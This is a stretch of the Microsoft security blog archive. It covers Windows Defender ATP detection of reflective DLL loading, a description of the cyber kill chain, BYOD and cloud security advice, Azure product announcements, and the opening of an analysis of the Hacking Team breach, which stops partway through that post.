Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.


Detecting reflective DLL loading with Windows Defender ATP

November 13th, 2017 No comments

Today’s attacks put emphasis on leaving little, if any, forensic evidence to maintain stealth and achieve persistence. Attackers use methods that allow exploits to stay resident within an exploited process or migrate to a long-lived process without ever creating or relying on a file on disk. In recent blogs we described how attackers use basic cross-process migration or advanced techniques like atom bombing and process hollowing to avoid detection.

Reflective Dynamic-Link Library (DLL) loading, which can load a DLL into a process memory without using the Windows loader, is another method used by attackers.

In-memory DLL loading was first described in 2004 by Skape and JT, who illustrated how one can patch the Windows loader to load DLLs from memory instead of from disk. In 2008, Stephen Fewer of Harmony Security introduced the reflective DLL loading process that loads a DLL into a process without being registered with the process. Modern attacks now use this technique to avoid detection.

Reflective DLL loading isnt trivialit requires writing the DLL into memory and then resolving its imports and/or relocating it. To reflectively load DLLs, one needs to author ones own custom loader.

However, attackers are still motivated to not use the Windows loader, as most legitimate applications would, for two reasons:

  1. Unlike when using the Windows loader (which is invoked by calling the LoadLibrary function), reflectively loading a DLL doesnt require the DLL to reside on disk. As such, an attacker can exploit a process, map the DLL into memory, and then reflectively load DLL without first saving on the disk.
  2. Because its not saved on the disk, a library that is loaded this way may not be readily visible without forensic analysis (e.g., inspecting whether executable memory has content resembling executable code).

Instrumentation and detection

A crucial aspect of reflectively loading a DLL is to have executable memory available for the DLL code. This can be accomplished by taking existing memory and changing its protection flags or by allocating new executable memory. Memory procured for DLL code is the primary signal we use to identify reflective DLL loading.

In Windows 10 Creators Update, we instrumented function calls related to procuring executable memory, namely VirtualAlloc and VirtualProtect, which generate signals for Windows Defender Advanced Threat Protection (Windows Defender ATP). Based on this instrumentation, weve built a model that detects reflective DLL loading in a broad range of high-risk processes, for example, browsers and productivity software.

The model takes a two-pronged approach, as illustrated in Figure 1:

  1. First, the model learns about the normal allocations of a process. As a simplified example, we observe that a process like Winword.exe allocates page-aligned executable memory of size 4,000 and particular execution characteristics. Only a select few threads within the Winword process allocate memory in this way.
  2. Second, we find that a process associated with malicious activity (e.g., executing a malicious macro or exploit) allocates executable memory that deviates from the normal behavior.

Figure 1. Memory allocations observed by a process running normally vs. allocations observed during malicious activity

This model shows that we can use memory events as the primary signal for detecting reflective DLL loading. In our real model, we incorporate a broad set of other features, such as allocation size, allocation history, thread information, allocation flags, etc. We also consider the fact that application behavior varies greatly because of other factors like plugins, so we add other behavioral signals like network connection behavior to increase the effectiveness of our detection.

Detecting reflective DLL Loading

Lets show how Windows Defender ATP can detect reflective DLL loading used with a common technique in modern threats: social engineering. In this attack, the target victim opens a Microsoft Word document from a file share. The victim is tricked into running a macro like the code shown in Figure 2. (Note: A variety of mechanisms allow customers to mitigate this kind attack at the onset; in addition, several upcoming Office security features further protect from this attack.)

Figure 2. Malicious macro

When the macro code runs, the Microsoft Word process reaches out to the command-and-control (C&C) server specified by the attacker, and receives the content of the DLL to be reflectively loaded. Once the DLL is reflectively loaded, it connects to the C&C and provides command line access to the victim machine.

Note that the DLL is not part of the original document and does not ever touch the disk. Other than the initial document with the small macro snippet, the rest of the attack happens in memory. Memory forensics reveals that there are several larger RWX sections mapped into the Microsoft Word process without a corresponding DLL, as shown in Figure 3. These are the memory sections where the reflectively loaded DLL resides.

Figure 3. Large RWX memory sections in Microsoft Word process upon opening malicious document and executing malicious macro

Windows Defender ATP identifies the memory allocations as abnormal and raises an alert, as shown in Figure 4. As you can see (Figure 4), Windows Defender ATP provides context on the document, along with information on command-and-control communication, which can allow security operations personnel to assess the scope of the attack and start containing the breach.

Figure 4. Example alert on WDATP

Microsoft Office 365 Advanced Threat Protection protects customers against similar attacks dynamic behavior matching. In attacks like this, SecOps personnel would see an Office 365 ATP behavioral detection like that shown in Figure 5 in Office 365s Threat Explorer page.

Figure 5. Example Office 365 ATP detection

Conclusion: Windows Defender ATP uncovers in-memory attacks

Windows 10 continues to strengthen defense capabilities against the full range of modern attacks. In this blog post, we illustrated how Windows Defender ATP detects the reflective DLL loading technique. Security operations personnel can use the alerts in Windows Defender ATP to quickly identify and respond to attacks in corporate networks.

Windows Defender Advanced ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect the invariant techniques used in attacks. Enhanced instrumentation and detection capabilities in Windows Defender ATP can better expose covert attacks.

Windows Defender ATP also provides detailed event timelines and other contextual information that SecOps teams can use to understand attacks and quickly respond. The improved functionality in Windows Defender ATP enables them to isolate the victim machine and protect the rest of the network.

For more information about Windows Defender ATP, check out its features and capabilities and read about why a post-breach detection approach is a key component of any enterprise security strategy. Windows Defender ATP is built into the core of Windows 10 Enterprise and can be evaluated free of charge.


Christian Seifert

Windows Defender ATP Research


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.


Disrupting the kill chain

This post is authored by Jonathan Trull, Worldwide Executive Cybersecurity Advisor, Enterprise Cybersecurity Group.

The cyber kill chain describes the typical workflow, including techniques, tactics, and procedures or TTPs, used by attackers to infiltrate an organization’s networks and systems.  The Microsoft Global Incident Response and Recovery (GIRR) Team and Enterprise Threat Detection Service, Microsoft’s managed cyber threat detection service, identify and respond to thousands of targeted attacks per year.  Based on our experience, the image below illustrates how most targeted cyber intrusions occur today.


The initial attack typically includes the following steps:

  • External recon –  During this stage, the attacker typically searches publicly available sources to identify as much information as possible about their target.  This will include information about the target’s IP address range, business operations and supply chain, employees, executives, and technology utilized.  The goal of this stage is to develop sufficient intelligence to increase the chances of a successful attack. If the attacker has previously penetrated your environment, they may also refer to intelligence gathered during previous incursions.
  • Compromised machine – Attackers continue to use socially engineered attacks to gain an initial foothold on their victim’s network.  Why?  Because these attacks, especially if targeted and based on good intelligence, have an extremely high rate of success.  At this stage, the attacker will send a targeted phishing email to a carefully selected employee within the organization.  The email will either contain a malicious attachment or a link directing the recipient to a watering hole.  Once the user executes the attachment or visits the watering hole, another malicious tool known as a backdoor will be installed on the victim’s computer giving the attacker remote control of the computer.
  • Internal Recon and Lateral Movement – Now that the attacker has a foothold within the organization’s network, he or she will begin gathering information not previously available externally.  This will include performing host discovery scans, mapping internal networks and systems, and attempting to mount network shares.  The attacker will also begin using freely available, yet extremely effective tools, like Mimikatz and WCE to harvest credentials stored locally on the initially compromised machine and begin planning the next stage of the attack as shown below.


  • Domain Dominance – At this stage, the attacker will attempt to elevate their level of access to a higher trusted status within the network.  The attacker’s ultimate goal is to access your data and the privileged credentials of a domain administrator offers them many ways to access to your valuable data stores.  Once this occurs, the attacker will begin to pivot throughout the network either looking for valuable data or installing ransomware for future extortion attempts or both.
  • Data Consolidation and Exfiltration – Now that the attacker has access to the valuable data within the organization’s systems, he or she must consolidate it, package it up, and send it out of the network without being detected or blocked.  This is typically accomplished by encrypting the data and transferring it to an external system controlled by the attacker using approved network protocols like DNS, FTP, and SFTP or Internet-based file transfer solutions.

Microsoft Secure and Productive Enterprise

The Microsoft Secure and Productive Enterprise is a suite of product offerings that have been purposely built to disrupt this cyber attack kill chain while still ensuring an organization’s employees remain productive.  Below, I briefly describe how each of these technologies disrupts the kill chain:

  • Office 365 Advanced Threat ProtectionThis technology is designed to disrupt the “initial compromise” stage and raise the cost of successfully using phishing attacks.
    Most attackers leverage phishing emails containing malicious attachments or links pointing to watering hole sites. Advanced Threat Protection (ATP) in Office 365 provides protection against both known and unknown malware and viruses in email, provides real-time (time-of-click) protection against malicious URLs, as well as enhanced reporting and trace capabilities.  Messages and attachments are not only scanned against signatures powered by multiple antimalware engines and intelligence from Microsoft’s Intelligent Security Graph, but are also routed to a special detonation chamber, run, and the results analyzed with machine learning and advanced analysis techniques for signs of malicious behavior to detect and block threats. Enhanced reporting capabilities also make it possible for security teams to quickly identify and respond to email based attacks when they occur.
  • Windows 10 –  This technology disrupts the compromised machine and lateral movement stages by raising the difficulty of successfully compromising and retaining control of a user’s PC and by protecting the accounts and credentials stored and used on the device.
    If an attacker still manages to deliver malware through to one of the organization’s employees by some other mechanism (e.g., via personal email), Windows 10’s security features are designed to both stop the initial infection, and if infected, prevent further lateral movement. Specifically, Windows Defender Application Guard uses new, hardware based virtualization technology to wrap a protective border around the Edge browser.  Even if malware executes within the browser, it cannot access the underlying operating system and is cleaned from the machine once the browser is closed.  Windows Device Guard provides an extra layer of protection to ensure that only trusted programs are loaded and run preventing the execution of malicious programs, and Windows Credential Guard uses the same hardware based virtualization technology discussed earlier to prevent attackers who manage to gain an initial foothold from obtaining other credentials stored on the endpoint.  And finally, Windows Defender Advanced Threat Protection is the DVR for your company’s security team.  It provides a near real-time recording of everything occurring on your endpoints and uses built-in signatures, machine learning, deep file analysis through detonation as a service, and the power of the Microsoft Intelligent Security Graph to detect threats.  It also provides security teams with remote access to critical forensic data needed to investigate complex attacks.
  • Microsoft Advanced Threat AnalyticsThis technology disrupts the lateral movement phase by detecting lateral movement attack techniques early, allowing for rapid response.
    If an attacker still manages to get through the above defenses, compromise credentials, and moves laterally, the Microsoft Advanced Threat Analytics (ATA) solution provides a robust set of capabilities to detect this stage of an attack.  ATA uses both detection of known attack techniques as well as a user-based analytics that learns what is “normal” for your environment so it can spot anomalies that indicate an attack. Microsoft ATA can detect internal recon attempts such as DNS enumeration, use of compromised credentials like access attempts during abnormal times, lateral movement (Pass-the-Ticket, Pass-the-Hash, etc.), privilege escalation (forged PAC), and domain dominance activities (skeleton key malware, golden tickets, remote execution).
  • Azure Security Center – While Microsoft ATA detects cyber attacks occurring within an organization’s data centers, Azure Security Center extends this level of protection into the cloud.

And now for the best part.  As shown in the image below, each of the above listed technologies is designed to work seamlessly together and provide security teams with visibility across the entire kill chain.


Each of these technologies also leverage the power of the Microsoft Intelligent Security Graph, which includes cyber threat intelligence collected from Microsoft’s products and services, to provide the most comprehensive and accurate detections.

  • Cloud App Security, Intune, Azure Information Protection, and Windows 10 Information Protection – And finally, the Microsoft Secure and Productive Enterprise Suite provides significant capabilities to classify and protect data and prevent its loss.  Among other capabilities, Microsoft Cloud App Security can identify and control the use of unsanctioned cloud applications.  This helps organizations prevent data loss, whether from an attack or rogue employee, via cloud-based applications.  Intune and Windows 10 Information Protection prevent corporate data from being intermingled with personal data or used by unsanctioned applications whether on a Windows 10 device or on iOS or Android based mobile devices.  And finally, Azure Information Protection provides organizations and their employees with the ability to classify and protect data using digital rights management technology.  Organizations can now implement and enforce a need-to-know strategy thereby significantly reducing the amount of unencrypted data available should an attacker gain access to their network.

Finally, Microsoft’s Enterprise Cybersecurity Group (ECG) also offers a range of both proactive and reactive services that leverages the capabilities of the Secure and Productive Enterprise suite in combination with the Intelligent Security Graph to help companies detect, respond to, and recover from attacks.

In the coming weeks, I will be following up with blogs and demos that go deeper into each of the above listed technologies and discuss how companies can most effectively integrate these solutions into their security strategies, operations, and existing technologies.  To learn more about Microsoft technologies visit Microsoft Secure..

Categories: Cloud Computing, cybersecurity Tags:

Securing the new BYOD frontline: Mobile apps and data

With personal smartphones, tablets, and laptops becoming ubiquitous in the workplace, bring your own device (BYOD) strategies and security measures have evolved. The frontlines have shifted from the devices themselves to the apps and data residing on—or accessed through—them.

Mobile devices and cloud-based apps have undeniably transformed the way businesses operate. But they also introduce new security and compliance risks that must be understood and mitigated. When personal and corporate apps are intermingled on the same device, how can organizations remain compliant and protected while giving employees the best productivity experience? And when corporate information is dispersed among disparate, often unmanaged locations, how can organizations make sure sensitive data is always secured?

Traditional perimeter solutions have proved to be inadequate in keeping up with the stream of new apps available to users. And newer point solutions either require multiple vendors or are just too complex and time-consuming for IT teams to implement. Companies need a comprehensive, integrated method for protecting information—regardless of where it is stored, how it is accessed, or with whom it is shared.

Microsoft’s end-to-end information protection solutions can help reconcile the disparity between user productivity and enterprise compliance and protection. Our identity and access management solutions integrate with existing infrastructure systems to protect access to applications and resources across corporate data centers and in the cloud.

The following Microsoft solutions and technologies provide access control on several levels, offering ample coverage that can be up and running with the simple click of a button:

Identity and access management

Simplify user access with identity-based single sign-on (SSO). Azure Active Directory Premium (Azure AD) syncs with existing on-premises directories to simplify access to any application—even those in the cloud—with a secured, unified identity. No more juggling multiple combinations of user names and passwords. Users sign in only once using an authenticated corporate ID, then receive a token enabling access to resources as long as the token is valid. Azure AD comes pre-integrated with thousands of popular SaaS apps and works seamlessly with iOS, Android, Windows, and PC devices to deliver multi-platform access. Not only does unified identity with SSO simplify user access, it can also reduce the overhead costs associated with operating and maintaining multiple user accounts

Secure and compliant mobile devices

Microsoft Intune manages and protects devices, corporate apps, and data on almost any personal or corporate-owned device. Through Intune mobile device management (MDM) capabilities, IT teams can create and define compliance policies to meet specific business requirements, deploy policies to users or devices, and monitor device and/or user compliance from a single administration console. Intune compliance policies deliver complete visibility into users’ device health, and enable IT to block or restrict access if the device becomes non-compliant. IT administrators also have the option to install device settings that perform remote actions, such as passcode reset, device lock, data encryption, or full wipe of a lost, stolen, or non-compliant device.

Conditional access

Microsoft Intune can also help reinforce access protection by verifying the health of users and devices prior to granting privileges with conditional access policies. Intune policies evaluate user and device health by assessing factors like IP range, the user’s group enrollment, and if the device is managed by Intune and compliant with policies set by administrators. During the policy verification process, Intune blocks the user’s access until the device is encrypted, a passcode is set, and the device is no longer jailbroken or rooted. Intune integrates with cloud services like Office 365 and Exchange to confirm device health and grant access based on health results.

Multi-factor authentication

Multi-factor authentication is a feature built into Azure Active Directory that provides an additional layer of authentication to help make sure only the right people have the right access to corporate applications. It prevents unauthorized access to on-premises and cloud apps with additional authentication required, and offers flexible enforcement based on user, device, or app to reduce compliance risks.

To learn more about BYOD security, download the free eBook, Protect Your Data: 7 Ways to Improve Your Security Posture


Managing cloud security: Four key questions to evaluate your security position

As cloud computing and the Internet of Things (IoT) continue to transform the global economy, businesses recognize that securing enterprise data must be viewed as an ongoing process. Securing the ever-expanding volume, variety, and sources of data is not easy; however, with an adaptive mindset, you can achieve persistent and effective cloud security.

The first step is knowing the key risk areas in cloud computing and IoT processes and assessing whether and where your organization may be exposed to data leaks. File sharing solutions improve the way people collaborate but pose a serious point of vulnerability. Mobile workforces decentralize data storage and dissolve traditional business perimeters.

SaaS solutions turn authentication and user identification into an always-on and always-changing topic. Second, it’s worth developing the habit—if you haven’t already—of reviewing and adapting cloud security strategy as an ongoing capability. To that end, here are eight key questions to revisit regularly, four of which we dive deeper into below.


Is your security budget scaling appropriately?

Security teams routinely manage numerous security solutions on a daily basis and typically monitor thousands of security alerts. At the same time, they need to keep rapid response practices sharp and ready for deployment in case of a breach. Organizations must regularly verify that sufficient funds are allocated to cover day-to-day security operations as well as rapid, ad hoc responses if and when a breach is detected.

Do you have both visibility into and control of critical business data?

With potential revenue loss from a single breach in the tens of millions of dollars, preventing data leaks is a central pillar of cloud security strategy. Regularly review how, when, where, and by whom your business data is being accessed. Monitoring whether permissions are appropriate for a user’s role and responsibilities as well as for different types of data must be constant.

Are you monitoring shadow IT adequately?

Today, the average employee uses 17 cloud apps, and mobile users access company resources from a wide variety of locations and devices. Remote and mobile work coupled with the increasing variety of cloud-based solutions (often free) raises concerns that traditional on-premises security tools and policies may not provide the level of visibility and control you need. Check whether you can identify mobile device and cloud application users on your network, and monitor changes in usage behavior. To mitigate risks of an accidental data breach, teach current and onboarding employees your organization’s best practices for using ad hoc apps and access.

Is your remote access security policy keeping up?

Traditional remote access technologies build a direct channel between external users and your apps, and that makes it risky to publish internal apps to external users. Your organization needs a secure remote access strategy that will help you manage and protect corporate resources as cloud solutions, platforms, and infrastructures evolve. Consider using automated and adaptive policies to reduce time and resources needed to identify and validate risks.


These are just a few questions to get you thinking about recursive, adaptive cloud security. Stay on top of your security game by visiting resources on Microsoft Secure.

Categories: Cloud Computing, IoT, SaaS, security Tags:

Introducing the Microsoft Secure blog

For the past ten years on this blog we have shared Microsoft’s point of view on security, privacy, reliability, and trust. It has become the place to go for in-depth articles on Microsoft products and services, as well as tips and recommendations for improving security in your organization.

Last November, Microsoft CEO Satya Nadella outlined our new approach to cybersecurity — one that leverages Microsoft’s unique perspective on threat intelligence, informed by trillions of signals from billions of sources. This new approach integrates security into the platform and incorporates solutions from our partners. We invest more than $1 billion in R&D each year to advance our capabilities in all of these areas. The umbrella term we give those investments is Microsoft Secure.

With this fresh perspective, we’ve heard great feedback from our customers—and they’ve asked us to share more. So now is a great time to refresh the blog – with a new look and feel, and a new name: the Microsoft Secure Blog.

We will continue to share information about Microsoft products and services, as well as our perspective on industry trends, from an expanded roster of experts and about an even broader range of topics that we know our readers are interested in.

Categories: Cloud Computing, cybersecurity Tags:

New Microsoft Azure Security Capabilities Now Available

In November, Microsoft CEO Satya Nadella outlined a new comprehensive, cross company approach to security for our mobile-first, cloud-first world. To support this approach, Microsoft invests more than a billion dollars in security research and development, every year. Today we are announcing the general availability of key security capabilities in the Microsoft Cloud, which are products of this research and development investment: Azure Security Center, Azure Active Directory Identity Protection, and Azure Active Directory Privileged Identity Management.

These investments strengthen our efforts in three important areas:

  1. To deliver a holistic security platform where our products and services work in concert with each other, and with our partners in the security ecosystem, to protect our customers.
  2. Microsoft’s unique insights into the threat landscape, informed by trillions of signals from billions of sources, create an intelligent security graph that we use to inform how we protect all endpoints, better detect attacks and accelerate our response.
  3. To ensure that when your organization leverages the Microsoft Cloud, it can improve your security posture, versus what you are doing to protect your on-premises IT environment alone.

Azure Security Center is generally available
We are announcing that Azure Security Center is generally available. Azure Security Center provides customers around the world with security management and monitoring capabilities for the millions of resources they run in Microsoft Azure helping them keep pace with rapidly evolving threats in ways they likely could not achieve in their own datacenters.

Driven by Microsoft’s new approach to security, Azure Security Center is transforming how customers protect their cloud workloads. Powered by advanced analytics and a rich set of protection capabilities built into Azure, Security Center helps customers protect, detect, and respond to threats.

Since the preview launched in December 2015, Azure Security Center has helped protect over a 100,000 Azure subscribers and hundreds of thousands of virtual machines – providing our customers with a unified view of the security state of all their cloud workloads, recommending ways to strengthen their security posture in accordance with their company policies, and using behavioral analysis and machine learning to detect threats.

In addition, Azure Security Center integrates with an ecosystem of partners like Barracuda.

“Microsoft is an important partner to Barracuda as we look to help customers improve security for their deployments in Azure. Azure Security Center is just one part of the compelling security agenda we have seen from Microsoft, and we believe the way it integrates Barracuda solutions will be a great benefit to our customers,” said Nicole Napiltonia, VP Strategic Alliances at Barracuda.

In addition to announcing general availability, Azure Security Center includes a number of new features today:

  • Integrated vulnerability assessment from partners like Qualys
  • Options for integrating Security Center recommendations and alerts with existing operations and security information event management (SIEM) solutions
  • Expanded support for Linux and Cloud Services VMs
  • New algorithms which detect lateral movement, internal reconnaissance, outgoing attacks, malicious scripts, and more
  • Alerts are now mapped against cyber kill chain patterns to provide customers with a single view of an attack campaign and all of the related alerts – so they can quickly understand what actions the attacker took and what resources were impacted

You can get more details on new security capabilities for Azure customers from the blog post by Sarah Fender, Principal Program Manager, Azure Cybersecurity. The blog provides information on how to quickly get started with Azure Security Center to get better control and protection for your Azure resources.

Azure Active Directory Identity Protection
Another great example of a new Microsoft security investment is Azure Active Directory Identity Protection. Azure Active Directory security capabilities are built on Microsoft’s long experience protecting identities used to access Microsoft’s consumer and enterprise services, and gains tremendous accuracy by analyzing the signal from over 14 billion logins every day to help identify potentially compromised user accounts.

Azure Active Directory Identity Protection builds on these capabilities and detects suspicious activities for end users and privileged identities based on signals like brute force attacks, leaked credentials, logins from unfamiliar locations and infected devices. Based on these suspicious activities, a user risk severity is calculated and risk-based policies can be configured allowing the service to automatically protect the identities of your organization from future threats.

Azure Active Directory Identity Protection will become generally available later in the quarter. Enterprise customers should evaluate the preview of Azure Active Directory Identity Protection now, so that they are ready to use it when it becomes generally available.

Azure Active Directory Privileged Identity Management
Some of the threats that keep Chief Information Security Officers up at night include threats to privileged identities like administrator accounts. Some examples of these threats include:

  • Malicious or rogue administrators
  • Administrator credentials leaked via phishing attacks
  • Administrator credentials cached on compromised systems
  • User accounts that are granted temporary elevated privileges that become permanent.

More and more organizations are realizing that they have to strictly manage privileged accounts and monitor their activities because of the risk associated with their misuse. With Azure AD Privileged Identity Management you can manage, control, and monitor access to resources in Azure AD as well as other Microsoft online services like Office 365 or Microsoft Intune.

Azure Active Directory Privileged Identity Management will become generally available later in the quarter. I encourage you to evaluate the preview that became available in May so that you are ready to adopt this great new cloud security capability when it is generally available next month.

More good news is that we’ve made it super easy and cost effective for enterprise customers to get Azure Active Directory Identity Protection and Azure AD Privileged Identity Management by including them in the new Microsoft Enterprise Mobility + Security (EMS) E5 suite. You can get all the details, including all the other mobility and security related products and services included in EMS that were just announced, here. If your security strategy reaches more broadly to include Office 365, Windows 10 Enterprise, and EMS, consider the recently announced offering called Secure Productive Enterprise.

These key cloud security capabilities are a big step forward, and will help our customers protect, detect and respond to threats in a mobile-first, cloud-first world. To learn more about our security strategy and investments, visit the Microsoft Secure website.

Michal Braverman-Blumenstyk
General Manager, Azure Security

Categories: Cloud Computing Tags:

Connecting the dots to get ahead of your next security challenge

It is turbulent times we live in. The same technology that provides unprecedented global connections and productivity also provides hackers unprecedented surface area to commit headline-earning crimes. That’s why Microsoft is investing over $1 billion annually in security capabilities and connecting dots across the critical endpoints of today’s cloud and mobile world to help you keep up with security challenges.

Join Ann Johnson and myself as we talk about the Top 5 security threats facing your business – and how to respond, on June 29th at 10:00 am PST to discover our unique approach to security and how to benefit from the insight into the threat landscape that Microsoft derives from trillions of signals from billions of sources.

Change comes fast. It used to be that many organizations would lock down their networks and not even allow external web browsing from within their networks. Today, users need to be connected to people all over the world, using all kinds of social media tools, and other applications, most in the cloud. New devices are coming on the market that have the potential to boost productivity in ways we’ve never seen. To not allow these actions and tools would doom your organization to obscurity. But cybercriminals have become more sophisticated, too. How do you avoid a security breach while still allowing employees to stay ahead of the curve? We’ll cover this balance in our webinar.

Microsoft has taken an end to end look at these issues, and has solutions that cross products, technologies, and platforms.

On the front lines, your employees hold the key to your network’s security every time they log on or open an email. Windows 10, with Microsoft Passport and Windows Hello, and Azure Active Directory, which we will touch on in the webinar, help you go beyond passwords and put authentication in the tough-to-replicate physical world of the user’s machine and biometrics. And Office 365 can help identify and isolate malicious attachments and links in your users’ emails before they harm your network.

Devices too. Your company laptop used to be pretty bare-bones, right? Use it for work, and that’s it. You had your own toys to use for personal stuff, and as time wore on those devices became more and more indispensable to your daily life. People started to connect to email servers from their phones, and the lines started blurring from there. It can create a security nightmare for IT, especially since everyone has a different favorite platform. We created Microsoft Enterprise Mobility Suite to ensure secure interactions with your network no matter what the device or platform. We will also cover ensuring device security while enabling mobile work in our webinar.

And then there’s the cloud. So many questions about security, manageability, control. Well, your employees aren’t waiting for you to figure it out; 80% of employees’ report using cloud apps that aren’t approved by IT. With Microsoft Cloud App Security, you can discover all the cloud apps in use on your network, and decide which ones to allow or block.

Say yes to rolling with the changes. Boost your organization’s productivity and rest assured that your network is protected because we have connected the dots in today’s cloud and mobile world.

Don’t miss out! Register today and join us on June 29, 2016 at 10:00 PST, for Top 5 security threats facing your business – and how to respond.

Julia White
General Manager, Cloud + Enterprise

Categories: Cloud Computing, cybersecurity Tags:

Dream Team for Moving to the Cloud

June 9th, 2016 No comments

The U.S. men’s basketball team suffering defeat, placing third even, at the 1988 Summer Olympics, in which the U.S. should unquestionably have dominated, renewed calls to use professional athletes in the games. The following year it was agreed, and U.S. basketball asked the NBA to supply players for the upcoming 1992 games in Barcelona. The Dream Team was assembled. What followed was a phenomenon like no one had anticipated. Of course the team swept the games and earned Olympic gold. The games, and the game of basketball, have never been the same.

What if your organization’s move to the cloud could be just as game-changing? To make it so, you need to assemble your own Dream Team for making the move. Who’s your Michael Jordan or Magic Johnson? Larry Bird? Or your Charles Barkley at the table for moving to the cloud?

Getting a team of the right players together from the onset, to discuss and debate the move all at the same time, can dramatically accelerate the discussion and get your business to the cloud sooner. I have talked to many, many customers over the years about adopting cloud services. Very often these conversations would uncover security blockers that were preventing enterprise customers from adopting the cloud. What I discovered after so many great meetings is exactly who needs to be on the Dream Team:

  • Your chief information security officer (CISO) or highest ranking security role in the organization. This person is responsible for defining the security policy, and signing off on the cloud security plan.
  • The chief information officer is the center on the team. This role helps balance the business realities with all the things the CISO and vice president of infrastructure might be concerned about, as well as ensuring legal sign off.
  • Chief privacy officer, or highest ranking privacy role. This person is responsible for your organization’s privacy policy. Privacy and security are typically two top-of-mind topics when organizations initially evaluate moving to the cloud, as well as two of the main principles of Microsoft’s Trusted Cloud.
  • Your organization’s general counsel, or highest ranking attorney. Because, let’s face it, very little is going to happen if legal doesn’t approve it. Attorneys who ultimately approve an organization’s cloud service contracts needs to understand the roles and shared responsibilities between cloud service providers and their organization to understand risks that might be important to the organization.
  • If the IT infrastructure team is separate from any of the teams led by the aforementioned leaders, be sure to include their leader as well because they will likely be part of the deployment. If their questions aren’t addressed up front, early in the evaluation process, the organization might procure a cloud service, but deployment could face lengthy delays.
  • In regulated industries, the highest ranking compliance officer needs also to be included. Ensuring that your organization’s compliance obligations are met by the cloud service(s) you are planning to use typically isn’t optional. Bringing your compliance officer on your cloud evaluation journey will help accelerate the process.

Getting this team into a room together, likely more than once, gets key questions answered quickly. It will also help the evaluation process stay on course if one of the organization’s leaders should change roles or leave the organization.

Magic Johnson famously commented after the 1992 Olympics, “I look to my right, there’s Michael Jordan … I look to my left, there’s Charles Barkley or Larry Bird … I didn’t know who to throw the ball to!” Everyone on your Cloud Dream Team has a key stake in the move. Frankly, many at the table are wondering what the other thinks, so it is best to get it all out in the open. This will eliminate second-guessing and accelerate getting all the answers to key questions. The longer it takes to get the team using the same play book, the harder it will be to start winning.

One factor in conversations about trusting the cloud that often gets overlooked is innovation. Security, privacy and compliance are very important considerations when evaluating cloud services. But, for those organizations already using the cloud, the pace of innovation they see compared with their own datacenters is typically one of the biggest benefits they tell me about. Don’t underestimate the importance of innovation, around security for example, when evaluating cloud services. Check out the number of security-related offerings on Microsoft’s cloud platform road map at any given time and you might be pleasantly surprised. The younger, up-and-coming companies I have talked with aren’t encumbered by an on-premises IT legacy. If you are watching the up-and-comers in your industry and others, like Michael Jordan studied the game tapes of the competition in the 1992 Olympics, you’ll notice that they are not held back by an on-premises past. For them there is no question about the clear advantages of a mobile-first, cloud-first world. These young organizations are far ahead in this regard.

So who’s on your Dream Team? Start assembling them and preparing to take advantage of the benefits of the cloud. To learn more, visit our Trusted Cloud website.

Tim Rains
Director, Security

Categories: Cloud Computing Tags:

Microsoft publishes guide for secure and efficient integration of cloud services into government operations

June 1st, 2016 No comments

Estimates show that the global cloud computing market grew by 28 percent last year. Cloud is becoming an established technology for conducting and enabling business. Likewise, around the world, public sector cloud adoption is on the rise. The IDC predicts that public sector spending on cloud services will grow to $128 billion by 2018, more than doubling the amount spent in 2014. Governments are no longer determining if they’ll move to the cloud; they are focusing on when and how to integrate cloud services efficiently, effectively, and securely.

While cloud computing is undoubtedly a transformative technology, questions continue to arise about how to best embrace the power and agility of cloud services. Governments are working to determine what role they should play, how to best capitalize on cloud’s potential, and how to ensure that security and resilience requirements are met. Microsoft is committed to supporting governments on this journey and has developed Transforming Government: A cloud assurance program guide, which we are publishing today.

The guide has been designed to help governments as they develop and implement cloud assurance programs. Governments are no strangers to technology, and many have long-established information assurance and IT security programs. In fact, many established programs and practices can be re-used and adapted for a cloud environment. Governments also need to consider different aspects of the cloud experience, including efficiency, cost, and user experience, keeping in mind the all-important balance between security, performance, and innovation. Once there is alignment and a clear understanding of the intended outcomes, governments can begin to establish processes in support of them.

In three distinct phases, our cloud assurance program guide demonstrates the benefits that can be derived from adapting a holistic approach to IT risk management to this new technology revolution. In developing cloud assurance programs, governments may need to realign or create new authorities or processes to build trust between cloud service providers and government cloud users. From there, they should consider working in partnerships with cloud providers, the architects of cloud services, to evolve their risk management approaches in ways that are consistent with cloud operations.

A purposefully structured cloud assurance program—one with clearly outlined objectives tied to risk-based outcomes—can lay a foundation for government innovation. Cloud assurance programs are the portal to accessing a plethora of cloud services and apps with confidence in best-in-class security. However, unlike boxed-products programs (such as Common Criteria) in which certification can take years, the rate of cloud innovation means that cloud assurance programs must be calibrated to match the pace of technology upgrades while still meeting the established security bar.

A mature approach is marked by customer-defined security outcomes (what security objectives governments want to achieve) and CSP-determined security techniques (how to meet those outcomes). It reflects a progressive dialogue that requires collaboration across the cloud assurance stakeholder community. As governments work to continuously improve their cloud assurance programs to this desired end-state, this guide offers interim steps that governments can implement today.

Establishing a cloud assurance program is an investment – but one that pays significant dividends.

Categories: Cloud Computing Tags:

Hacking Team Breach: A Cyber Jurassic Park

Paleontology is the scientific study of the life of long-extinct animals. Paleontologists hypothesize about the behavior of the different species of dinosaurs, sometimes based on a few collected fossils and bones. We can only imagine how much more they were able to learn if they had a chance to observe some living herds of dinosaurs.

Incident Response (IR) is the cyber equivalent of paleontology. In most cases, IR experts are called long after the breach had occurred. They find themselves searching for tiny forensic cyber “bones” and then try to glue them together in order to reassemble the threat actor doings on the victim’s environment.

This is what is so unique in the recently published report on the Hacking Team breach, written by the threat actor itself. It’s a very unique, publicly available, firsthand account of the attacker side of a targeted attack. Therefore, this report should be analyzed thoroughly as it serves an unparalleled learning opportunity for the security community.

Hacking Team Breach in a Nutshell

According to Hacking Team‘s own website the company’s mission is to “provide effective, easy-to-use offensive [cyber] technology to the worldwide law enforcement and intelligence communities.”

On July 5, 2015, the Hacking Team’s Twitter account was compromised to publish an announcement of a data breach against Hacking Team’s computer systems. The initial message read, “Since we have nothing to hide, we’re publishing all our e-mails, files, and source code …” and provided links to over 400 gigabytes of data, including alleged internal e-mails, invoices, and source code.

